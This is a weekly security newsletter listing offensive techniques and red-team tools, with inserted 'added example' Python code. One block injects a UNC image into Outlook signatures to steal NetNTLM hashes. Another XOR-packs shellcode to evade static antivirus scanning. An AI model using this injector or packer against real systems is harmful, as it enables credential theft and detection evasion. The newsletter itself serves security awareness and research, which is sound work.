Last Week in Security (LWiS) - 2021-01-18
Containerd breakout PoC (@ChaosDatumz), the "glue" principle (@theluemmel), lockscreen bypass (@jonasLyk), VBox escape 0day (@Sauercl0ud), beacon shellcode generator (@ryanstvnson), browser backdoor (@_batsec_), nim obfuscation (@LittleJoeTables), and more!
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-01-11 to 2021-01-18.
News
- Hackers steal Mimecast certificate used to encrypt customers’ M365 traffic. On the heels of the SolarWinds news, it feels like someone is going after "supply chain" type targets pretty hard.
- So Many People Are Using Signal It Caused An Outage. With WhatsApp's heavy handed, but in reality minor, privacy policy change users have been flocking to Signal. Perhaps 2021 will be the year of digital privacy? Other privacy minded services saw growth as DuckDuckGo surpasses 100 million daily search queries for the first time.
- SUNSPOT: An Implant in the Build Process. The SolarWinds fallout continues in this analysis of the implant that was used to backdoor the Orion software. Like much of the operation, this is top-notch hacking. Sunspot waited until Orion was being built to insert the backdoor, so the code repositories never contained evidence of it. The number of mutexes and hash checks suggests a very thorough QA process for this. I wouldn't be surprised if somewhere there is a complete one-for-one Orion build environment in the basement of a government building.
- Malvuln - Finding and exploiting vulnerable Malware. This website and the @malvuln Twitter account are dedicated to finding vulnerabilities in malware. Detailed reports with PoCs are provided as well!
- Microsoft Defender Remote Code Execution Vulnerability. A patch for this vulnerability (CVE-2021-1647) was part of January Patch Tuesday from Microsoft, and for normal users, Defender updates automatically in the background. For enterprises with Windows Server Update Services (WSUS), this should be a high priority patch. Any action that results in Defender scanning a malicious file could result in code execution as SYSTEM. While a PoC has been teased [UPDATE: this is vulnerability researcher bait and totally fake!], no code is public yet.
- Introducing the In-the-Wild Series. Google's Project Zero team released six posts about in-the-wild zero days, breaking down the root causes and going into technical detail for each.
- Windows 10 bug crashes your PC when you access this location. Opening a file path in a browser (Chrome and Firefox have been reported to work) will blue screen a fully patched Windows 10 machine. 1995 called and wants its bug back.
Techniques
- Finding 0day to hack Apple. A CMS 0day led to shells on a few Apple systems. This is a detailed walkthrough of how the vulnerabilities were found and chained, as well as the web application firewall (WAF) issues and bypasses.
- Making Clouds Rain :: Remote Code Execution in Microsoft Office 365. This Exchange RCE bug doesn't want to die, as this is now the third patch bypass. As it stands it requires some administrative rights on an on-premises Exchange server (the post says DLP rights, but other sources say those are not required).
- Sailing Past Security Measures In AD. This post covers my favorite technique in red teaming: "glue." There are so many good tools and techniques out there, if you can glue a few together or modify them slightly, you can create some effective "custom" tooling. Part of the reason I write this blog is to bring these building blocks to light for myself and others to "glue" together.
- Sign over Your Hashes – Stealing NetNTLM Hashes via Outlook Signatures. A 1x1 pixel image pointing at an attacker-controlled UNC path, added to the signature of a user's Outlook client (which requires neither elevated permissions nor GUI access), can yield NetNTLM hashes from anyone who opens a message. Sigwhatever automates this whole process, including the cleanup!
- BitLocker Lockscreen bypass. This was patched on 2020-07-14, but is quite the trick nonetheless. By inserting a specially crafted USB stick and using a DLL hijack for Narrator, an attacker is able to get SYSTEM account code execution on a locked Windows 10 machine. This disclosure likely made many evil maids very upset.
- Escaping VirtualBox 6.1: Part 1. If the 6 month old lockscreen bypass was too old news for you, secret club delivers a fresh 0day VirtualBox escape on Windows. A demo and PoC are available.
- Local Privilege Escalation in VMware vRealize Automation (vRA) Guest Agent Service. This reads like a CTF challenge with the use of sloppy scripting and bad permissions. Third-party services are the source of many local privilege escalation vulnerabilities on Windows.
- Pushing back on userland hooks with Cobalt Strike. With all the direct syscall development recently, it was only a matter of time before Cobalt Strike got in on the fun. Mudge's unhook-bof adds a beacon command which will "refresh" the DLLs of the beacon process with unhooked variants.
- Hijacking connections without injections: a ShadowMoving approach to the art of pivoting. Have you ever wanted to use a legitimate process to send out your command and control traffic? By duplicating the Ancillary Function Driver (AFD) socket handles that back an existing network connection in another process, the ShadowMove authors are able to send and receive messages over that socket without process injection or any special privileges.
- Divide and Conquer - A technique to bypass NextGen AV. Behavioral "next-gen" antivirus and endpoint detection software often gives a process a maliciousness score based on how many "bad" actions it takes. The idea behind divide and conquer (and the earlier malWASH) is to have different processes do each step of the malicious activity so no one process crosses the detection threshold of the AV/EDR product.
- Breaking The Browser – A tale of IPC, credentials and backdoors. As everyone and everything moves to a single sign on web app, the browsers have become the gatekeepers to valuable information. By injecting into Chrome, all kinds of tricks can be pulled - from credential stealing to a full implant stager.
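The Outlook signature trick above in code, as an added example that is not part of the post or the Sigwhatever tool: inject a hidden 1x1 image that loads from a UNC path into a signature's HTML, remove it again afterwards, and (for the blue team) scan a signatures folder for any image whose source is a UNC path. The marker comment, the sample signature and the UNC path are constructed for this example; the `%APPDATA%\Microsoft\Signatures` location is the usual one but is not verified here.

```python
"""Added example (not from the post or Sigwhatever): UNC image injection into
an Outlook HTML signature, its cleanup, and a defender-side scan."""
import re
from pathlib import Path

# Assumed marker so that cleanup removes only what this script inserted.
MARKER = "<!-- sig-unc-example -->"
# Any <img> whose src starts with \\ (a UNC path); works on injected and
# hand-crafted signatures alike.
UNC_IMG_RE = re.compile(
    r'<img\b[^>]*\bsrc\s*=\s*["\']?(\\\\[^"\'\s>]+)', re.IGNORECASE)


def inject_unc_image(html: str, unc_path: str) -> str:
    """Return html with a hidden 1x1 <img> loading from unc_path placed
    before </body>. When Outlook renders the signature it fetches the image
    over SMB and authenticates, leaking a NetNTLM response to that host."""
    if MARKER in html:
        return html  # already injected; stay idempotent
    tag = (f'{MARKER}<img src="{unc_path}" width="1" height="1" '
           f'alt="" style="display:none">{MARKER}')
    idx = html.lower().rfind("</body>")
    if idx == -1:
        return html + tag
    return html[:idx] + tag + html[idx:]


def remove_unc_image(html: str) -> str:
    """Cleanup: strip everything between the two markers, markers included."""
    pattern = re.compile(re.escape(MARKER) + r".*?" + re.escape(MARKER),
                         re.DOTALL)
    return pattern.sub("", html)


def find_unc_images(html: str) -> list:
    """Defender side: UNC targets of every <img> in the signature HTML."""
    return UNC_IMG_RE.findall(html)


def scan_signature_dir(sig_dir: Path) -> dict:
    """Scan every .htm/.html signature file in sig_dir; returns
    {filename: [unc targets]} for files that load images from UNC paths."""
    findings = {}
    for p in sig_dir.glob("*.htm*"):
        hits = find_unc_images(p.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[p.name] = hits
    return findings


# Constructed sample signature; a local cid: image is not flagged.
SAMPLE_SIGNATURE = ("<html><body><p>Jane Doe<br>Analyst, Example Corp</p>\n"
                    '<img src="cid:logo.png" width="120"></body></html>')

if __name__ == "__main__":
    poisoned = inject_unc_image(SAMPLE_SIGNATURE, r"\\10.0.0.5\share\pix.png")
    print(find_unc_images(poisoned))          # ['\\\\10.0.0.5\\share\\pix.png']
    print(remove_unc_image(poisoned) == SAMPLE_SIGNATURE)  # True
```

The defender scan catches the generic pattern (an image source beginning with `\\`), not just this script's marker, so it also finds manually edited signatures; pairing it with egress filtering of SMB (TCP 445) to the internet removes the payoff even when a signature slips through.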
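The scoring model behind the divide-and-conquer bypass above, as an added example that is not code from the Divide and Conquer post, malWASH or any AV product: a toy behavioural scorer run over a constructed event log in which the same three steps (open lsass, write remote memory, create remote thread) occur once inside a single process and once split across three sibling processes. Per-process scoring only alerts on the first; aggregating scores by process lineage catches both. The action weights, the threshold and the events are assumptions made for this example.

```python
"""Added example (not from the post or malWASH): per-process vs. per-lineage
behavioural scoring over a constructed process event log."""
from collections import defaultdict

# Assumed suspicion weights per observed action and an assumed alert threshold.
WEIGHTS = {
    "open_process_lsass": 40,
    "write_remote_memory": 30,
    "create_remote_thread": 40,
    "spawn_child": 5,
}
THRESHOLD = 80

# Constructed event log: (pid, ppid, action). pid 300 performs all three
# injection steps itself; pid 400 spawns 401, 402 and 403, which each do one.
EVENTS = [
    (300, 1, "open_process_lsass"),
    (300, 1, "write_remote_memory"),
    (300, 1, "create_remote_thread"),
    (400, 1, "spawn_child"),
    (400, 1, "spawn_child"),
    (400, 1, "spawn_child"),
    (401, 400, "open_process_lsass"),
    (402, 400, "write_remote_memory"),
    (403, 400, "create_remote_thread"),
]


def score_per_process(events):
    """Naive model: every process accumulates only its own actions."""
    scores = defaultdict(int)
    for pid, _ppid, action in events:
        scores[pid] += WEIGHTS.get(action, 0)
    return dict(scores)


def build_parent_map(events):
    return {pid: ppid for pid, ppid, _ in events}


def root_of(pid, parents):
    """Walk up the parent chain while the parent is itself a process we have
    events for; the topmost such process is the lineage root."""
    seen = set()
    while parents.get(pid) in parents and pid not in seen:
        seen.add(pid)
        pid = parents[pid]
    return pid


def score_per_lineage(events):
    """Lineage model: an action counts against the root of its process tree,
    so steps spread over siblings are summed together again."""
    parents = build_parent_map(events)
    scores = defaultdict(int)
    for pid, _ppid, action in events:
        scores[root_of(pid, parents)] += WEIGHTS.get(action, 0)
    return dict(scores)


def alerts(scores, threshold=THRESHOLD):
    """Sorted pids (or lineage roots) at or above the threshold."""
    return sorted(pid for pid, s in scores.items() if s >= threshold)


if __name__ == "__main__":
    print("per-process:", alerts(score_per_process(EVENTS)))  # [300]
    print("per-lineage:", alerts(score_per_lineage(EVENTS)))  # [300, 400]
```

Lineage aggregation is only one counter: stages launched through a service, scheduled task or WMI are not children of the orchestrator, so a real detection also correlates on the shared target (the same lsass handle or the same remote process being written and then started) and on time windows rather than on the process tree alone.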
Tools and Exploits
- StaticSyscallsDump is a Beacon Object File (BOF) for Cobalt Strike that unhooks the NtReadVirtualMemory function and uses it to create a minidump of a process (e.g. lsass). This should be able to bypass many AV/EDR solutions, and it works on a wide range of Windows versions, unlike other syscall memory dumpers (e.g. SharpMiniDump).
- abstractshimmer, the PoC for CVE-2020-15257 (the containerd host-network breakout from LWiS 2020-12-14), is out now. This could be a great breakout if you land on a container that shares the host's network namespace.
- CSSG is an Aggressor and Python script used to more easily generate and format beacon shellcode. It generates stageless beacon shellcode with an exposed exit method, plus additional formatting, encryption, encoding, compression, multiline output, etc.
- Denim makes compiling Nim code for Windows with obfuscator-llvm easy!
- printjacker is a post-exploitation tool that creates a persistence mechanism by overwriting Printconfig.dll with a shellcode injector. The persistence mechanism can be triggered by any user executing the wmic printer list command, and the shellcode runs with SYSTEM privileges. More details here.
- UnhookMe is a universal Windows API resolver and unhooker that addresses the problem of invoking unmonitored system calls from within your red team's malware.
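What the formatting side of a tool like CSSG does, as an added example that is not CSSG's own code: take a raw shellcode blob, optionally compress it, XOR it with a key, and emit it as a wrapped C, C# or Python byte array, together with the inverse so the output can be checked before it goes into a loader. The `SAMPLE_SHELLCODE` bytes are a constructed stand-in, not a real beacon, and the key and line width are arbitrary choices for the example.

```python
"""Added example (not from CSSG): compress + XOR a shellcode blob and format
it as a source-code byte array, with parse/untransform for verification."""
import re
import zlib

SAMPLE_SHELLCODE = bytes(range(64))  # constructed placeholder blob
KEY = b"lw1s"                         # example XOR key


def xor(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so it serves as both encrypt and decrypt."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def transform(data: bytes, key: bytes, compress: bool = False) -> bytes:
    """Compress first (so the XOR hides the zlib header), then XOR."""
    if compress:
        data = zlib.compress(data, 9)
    return xor(data, key)


def untransform(blob: bytes, key: bytes, compress: bool = False) -> bytes:
    """Inverse of transform(); what the loader would do at runtime."""
    data = xor(blob, key)
    return zlib.decompress(data) if compress else data


def format_array(data: bytes, lang: str = "c", name: str = "buf",
                 per_line: int = 16) -> str:
    """Render data as a byte array in the target language, per_line bytes
    per source line so the result pastes cleanly into a loader."""
    hexes = [f"0x{b:02x}" for b in data]
    lines = [", ".join(hexes[i:i + per_line])
             for i in range(0, len(hexes), per_line)]
    body = ",\n    ".join(lines)
    if lang == "c":
        return f"unsigned char {name}[{len(data)}] = {{\n    {body}\n}};"
    if lang == "csharp":
        return f"byte[] {name} = new byte[{len(data)}] {{\n    {body}\n}};"
    if lang == "python":
        return f"{name} = bytes([\n    {body}\n])"
    raise ValueError(f"unsupported lang: {lang}")


def parse_hex_array(text: str) -> bytes:
    """Pull the 0xNN tokens back out of any of the three formats."""
    return bytes(int(t, 16) for t in re.findall(r"0x[0-9a-fA-F]{2}", text))


if __name__ == "__main__":
    blob = transform(SAMPLE_SHELLCODE, KEY, compress=True)
    src = format_array(blob, "c", "buf")
    print(src)
    assert untransform(parse_hex_array(src), KEY, compress=True) == SAMPLE_SHELLCODE
```

XOR with a short key is obfuscation against static string and byte-pattern scanning, not encryption; the point of the round trip is to catch off-by-one formatting bugs (a dropped trailing byte, a wrong array length) before the loader ever runs.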
New to Me
This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!
- NimlineWhispers is a proof-of-concept port of Outflank's InlineWhispers tool, adapted to output inline assembly for Nim projects.
This post is cross-posted on SIXGEN's blog.